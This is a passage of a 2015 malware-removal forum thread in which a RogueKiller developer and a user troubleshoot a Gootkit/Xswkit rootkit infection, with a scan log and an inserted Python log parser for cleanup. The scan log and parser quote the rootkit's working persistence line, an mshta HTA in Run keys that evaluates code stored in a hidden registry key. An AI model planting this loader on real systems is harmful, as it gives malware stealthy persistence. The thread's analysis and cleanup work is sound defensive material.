Author Topic: [Gootkit/Xswkit] New rootkit found!  (Read 15117 times)


Tigzy
« Reply #15 on: January 02, 2015, 04:17:17 pm »
mmh, wide inject. I think the key is protected by all the injected processes.
The only way would be to remove the key "offline", like with an OTLPE CD: http://oldtimer.geekstogo.com/OTLPENet.exe

That's a CD ISO + burner software that you can boot from, and then it's a full Windows environment.
If you're an advanced user you'll find a regedit able to mount external hives; let me know if you think you're able to do it.

Tigzy
« Reply #16 on: January 02, 2015, 04:45:52 pm »
« Last Edit: January 03, 2015, 01:30:58 pm by Tigzy »

Tigzy
« Reply #17 on: January 03, 2015, 01:31:49 pm »
EP_X0FF has created a thread on kernelmode for that new infection; we're still analysing it and searching for its weaknesses.
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3669

Tigzy
« Reply #18 on: January 03, 2015, 03:33:30 pm »
It looks like a simple Run value removal is enough to remove the malware.
Can you please confirm once again?

Tigzy
« Reply #19 on: January 03, 2015, 03:54:55 pm »
Here's the infection log from the beta version of RogueKiller. I can put it online for testing if you need.

Code:
RogueKiller V10.1.1.0 [Dec 23 2014] par Adlice Software
email : http://www.adlice.com/contact/
Remontées : http://forum.adlice.com
Site web : http://www.adlice.com/fr/logiciels/roguekiller/
Blog : http://www.adlice.com

Système d'exploitation : Windows XP (5.1.2600 Service Pack 3) 32 bits version
Démarré en  : Mode normal
Utilisateur : tigzy [Administrateur]
Mode : Scan -- Date : 01/03/2015  15:37:17
Commutateurs : -nokill

¤¤¤ Processus : 4 ¤¤¤
[Tr.Gootkit] explorer.exe -- C:\WINDOWS\Explorer.EXE[7] -> [NoKill]
[Tr.Gootkit] svchost.exe -- C:\WINDOWS\System32\svchost.exe[x] -> [NoKill]
[Tr.Gootkit] firefox.exe -- C:\Program Files\Mozilla Firefox\firefox.exe[7] -> [NoKill]

¤¤¤ Registre : 10 ¤¤¤
[Tr.Gootkit] HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"  -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"  -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"  -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-21-823518204-842925246-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"  -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"  -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\.DEFAULT\Software\ xsw -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-19\Software\ xsw -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-20\Software\ xsw -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-21-823518204-842925246-839522115-1003\Software\ xsw -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-18\Software\ xsw -> Trouvé(e)

¤¤¤ Tâches : 0 ¤¤¤

¤¤¤ Fichiers : 0 ¤¤¤

¤¤¤ Fichier Hosts : 2 ¤¤¤
[C:\WINDOWS\System32\drivers\etc\hosts] 127.0.0.1       localhost
[C:\WINDOWS\System32\drivers\etc\hosts] ::1             localhost

¤¤¤ Antirootkit : 4 (Driver: Chargé) ¤¤¤
[IAT:Inl(Hook.IEAT)] (explorer.exe) ntdll.dll - RtlPcToFileHeader : Unknown @ 0x31939ba (jmp 0xffffffff8684f61d|jmp 0xf)
[IAT:Inl(Hook.IEAT)] (firefox.exe) ntdll.dll - NtDeviceIoControlFile : Unknown @ 0x1ecfa65 (jmp 0xffffffff855b2852|jmp 0x39|call 0xffffffffffffff3e)
[IAT:Inl(Hook.IEAT)] (firefox.exe) ntdll.dll - RtlPcToFileHeader : Unknown @ 0x1e839ba (jmp 0xffffffff8553f61d|jmp 0xf)
[IAT:Inl(Hook.IEAT)] (firefox.exe) DNSAPI.dll - DnsQuery_W : Unknown @ 0x1ecf8d0 (jmp 0xffffffff8affcb3c)

¤¤¤ Navigateurs web : 0 ¤¤¤

¤¤¤ Vérification MBR : ¤¤¤
+++++ PhysicalDrive0: VBOX HARDDISK +++++
--- User ---
[MBR] c708b764ca9daa4f8f33e4e8b3b517da
[BSP] f4eb87199eee8a432bb482bb55118447 : Windows XP MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 63 | Size: 4086 MB
User = LL1 ... OK
User = LL2 ... OK

============================================
RKreport_SCN_01032015_152034.log

Jojo51
« Reply #20 on: January 05, 2015, 09:29:03 am »
Hi!

Sounds good, it looks like you've done a great job! Thank you very much!!

Yes, if you can give me the new version I will test it on our infected computers. I will be your BETA tester !! :D

Speak soon,


Johnny

Jojo51
« Reply #21 on: January 05, 2015, 09:32:04 am »
No, simply deleting the RUN value doesn't stop the infection. It seems that there is still something in it that makes explorer.exe crash in a loop.

Tigzy
« Reply #22 on: January 05, 2015, 10:13:12 am »
You may want to try that version: http://download.adlice.com/RogueKiller_beta.exe

Jojo51
« Reply #23 on: January 05, 2015, 10:32:26 am »
Thanks! I've just downloaded it.

Do I need to start it in safe mode or normally? Does it clean all the infected hives or only the one the program is started from??

Sorry for the questions, but I want to be sure to use your tool with the best practice! ;)


Johnny

Tigzy
« Reply #24 on: January 05, 2015, 10:39:48 am »
All the hives are cleaned.
Normal mode should be ok.

Should you need additional info: http://www.adlice.com/gootkitxswkit-removal-roguekiller/
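An added example, not part of the thread or of RogueKiller: a small Python parser over registry lines in the log format from Tigzy's scan above (the sample is constructed, modelled on those lines), which flags the inline mshta "about:" HTA that eval()s a RegRead() result and builds a per-hive cleanup list. It shows why every HKEY_USERS hive needs both the Run value and the Software\ xsw loader key removed, as reply #24 states, rather than the Run value alone.

```python
import re

# Constructed sample in the RogueKiller log format from Tigzy's scan above (not a real scan);
# S-1-5-18 keeps only the xsw key, modelling a hive where the Run value was deleted by hand.
SAMPLE_LOG = r"""
[Tr.Gootkit] HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"  -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"  -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\.DEFAULT\Software\ xsw -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-19\Software\ xsw -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-18\Software\ xsw -> Trouvé(e)
"""

RUN_LINE = re.compile(
    r"^\[Tr\.Gootkit\] (HKEY_USERS\\[^\\]+)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
    r" \| (\S+) : (.*?)\s+-> ")
KEY_LINE = re.compile(r"^\[Tr\.Gootkit\] (HKEY_USERS\\[^\\]+)\\(Software\\ xsw) -> ")
# The inline HTA fetches its real payload with RegRead('...') and eval()s it.
REGREAD = re.compile(r"RegRead\('([^']+)'\)")

def is_registry_hta_loader(value_data):
    """True when a Run value is an inline mshta 'about:' HTA that eval()s a RegRead result."""
    d = value_data.lower()
    return "mshta" in d and "about:" in d and "eval(" in d and "regread(" in d

def parse_findings(log_text):
    """Map each HKEY_USERS hive to the Run value and loader key reported for it."""
    findings = {}
    for line in log_text.splitlines():
        m = RUN_LINE.match(line)
        if m and is_registry_hta_loader(m.group(3)):
            hive = findings.setdefault(m.group(1), {})
            hive["run_value"] = m.group(2)
            rr = REGREAD.search(m.group(3))
            # JScript source escapes backslashes; undo that to get the real key path.
            hive["reads"] = rr.group(1).replace("\\\\", "\\") if rr else None
        m = KEY_LINE.match(line)
        if m:
            findings.setdefault(m.group(1), {})["loader_key"] = m.group(2)
    return findings

def cleanup_plan(findings):
    """Per hive, both the Run value and the xsw key must go; the Run value alone is not enough."""
    plan = []
    for hive in sorted(findings):
        f = findings[hive]
        if "run_value" in f:
            plan.append((hive, "delete Run value " + f["run_value"]))
        if "loader_key" in f:
            plan.append((hive, "delete key " + f["loader_key"]))
    return plan
```

Run `cleanup_plan(parse_findings(SAMPLE_LOG))` to get the list; a hive that shows only the key (like S-1-5-18 in the sample) is exactly the leftover that a manual Run-value deletion misses.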

Jojo51
« Reply #25 on: January 05, 2015, 11:04:53 am »
Bad news :(

I have tested the BETA but it seems to fail to clean the infection. It can find it and starts the removal, but after the next reboot the threat is back. We can spot it when we restart RogueKiller. You will find in attachment the two scan reports, the first and the second after the cleaning/reboot.

Thanks for the help.


Johnny

Tigzy
« Reply #26 on: January 05, 2015, 11:08:14 am »
Jojo51, any chance I could get remote access to one of the infected computers with TeamViewer?
I think that rootkit did download some friend to join the party, and maybe it's protecting it. That's unusual, but very possible.
I'll send you a PM to meet on Skype.

EDIT: The RUN key hasn't been found. Strange.
« Last Edit: January 05, 2015, 11:11:15 am by Tigzy »

Jojo51
« Reply #27 on: January 05, 2015, 11:28:37 am »
Yes, no problems! :) We can plan a Teamviewer session on an infected computer today @03:00pm (french time).

You can use my email (**********) to add me in Skype, I'm logged on at the moment.

Does it sound ok for you?
« Last Edit: January 05, 2015, 11:32:49 am by Tigzy »

Tigzy
« Reply #28 on: January 05, 2015, 11:31:50 am »
Will contact you on Skype.
(I'm removing your address to avoid spam)

Tigzy
« Reply #29 on: January 06, 2015, 08:17:17 am »
For those who were following, it's probably the bootkit version of Gootkit.
So MBR/VBR infection of type Rovnix.